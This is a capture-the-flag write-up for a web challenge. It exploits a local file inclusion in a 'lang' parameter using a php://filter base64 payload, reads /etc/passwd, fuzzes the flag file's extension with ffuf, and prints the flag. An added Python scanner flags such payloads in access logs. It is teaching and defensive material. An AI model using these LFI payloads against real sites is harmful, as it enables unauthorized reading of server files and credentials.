# The Lair (web)

Let's start by visiting the web page:

<figure><img src="/files/a2LxhOHA4XdUYO1AfPfl" alt=""><figcaption><p>Showing homepage</p></figcaption></figure>

We see a simple page with some text. Other languages are available, and when we visit one of them the URL changes to:

```
http://127.0.0.1:8080/?lang=de.php
```

Some additional text is also shown on the page. This hints at an LFI, but the challenge description told us that "the flag isn't .txt", which means we need to fuzz for extensions and find a way to read all files (because some file types won't show in the browser).

Let's test a PHP filter that encodes to base64 to read files. According to HackTricks, we can use the following payload in an LFI to encode the output of files:

```
php://filter/read=convert.base64-encode/resource=/etc/passwd
```

As a full request URL:

```
http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/etc/passwd
```

Testing it on `/etc/passwd` to see if it's applicable here, we see Base64 data on the web page, and decoding it in CyberChef gives us:

<figure><img src="/files/yyBUv8Se8cFhBIf7NIpC" alt=""><figcaption><p>LFI POC</p></figcaption></figure>
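Seen from the server side, these requests stand out in the access log because the `lang` value is no longer one of the language files. The following is an added example, not part of the original writeup or the challenge code: it classifies `lang` values from log lines, and the log format, the sample lines and the allowlist (`en.php` is assumed, only `de.php` appears above) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: the only values the language switcher legitimately sends.
ALLOWED_LANGS = {"en.php", "de.php"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # php://, file://, ...

# Constructed sample lines in combined log format (not taken from the challenge).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /?lang=de.php HTTP/1.1" 200 4100',
    '203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /?lang=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2025:10:00:09 +0000] "GET /?lang=php://filter/read=convert.base64-encode/resource=/flag.php HTTP/1.1" 200 4043',
    '203.0.113.7 - - [01/Jan/2025:10:00:12 +0000] "GET /?lang=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 3979',
]


def classify_lang(value):
    """Return a verdict for one ?lang= value."""
    prev = None
    while prev != value:  # keep decoding to catch double-encoded input
        prev, value = value, unquote(value)
    if value in ALLOWED_LANGS:
        return "ok"
    if WRAPPER_RE.match(value):
        return "stream-wrapper"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    if value.startswith("/"):
        return "absolute-path"
    return "not-allowlisted"


def scan(log_lines):
    """Return (verdict, value) for every lang value that is not allowlisted."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            verdict = classify_lang(value)
            if verdict != "ok":
                findings.append((verdict, value))
    return findings


if __name__ == "__main__":
    for verdict, value in scan(SAMPLE_LOG):
        print(f"{verdict:16} {value}")
```

The same allowlist comparison, applied in the application before the value reaches the include, is what removes the LFI; the log scan only shows that someone tried.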

Now we can use ffuf to see if anything can be read at `/flag.EXTENSION`:

```
ffuf -u 'http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/flagFUZZ' -w raft-large-extensions-lowercase.txt
```

After running that command we see a lot of output, because every request returns 200 even when no file is read. So we add a size filter, `-fs 3979` (the size shown for those responses), and then we get:

```
.php                    [Status: 200, Size: 4043, Words: 1553, Lines: 152, Duration: 1ms]
```

`.php` is a valid hit. Let's read it; decoding the output in CyberChef gives us:

```
<?php

tuxCTF{F!lTer$?_but_I_THOU6Ht_BlooD}

?>
```

Done! Happy Hacking :) :vampire:.

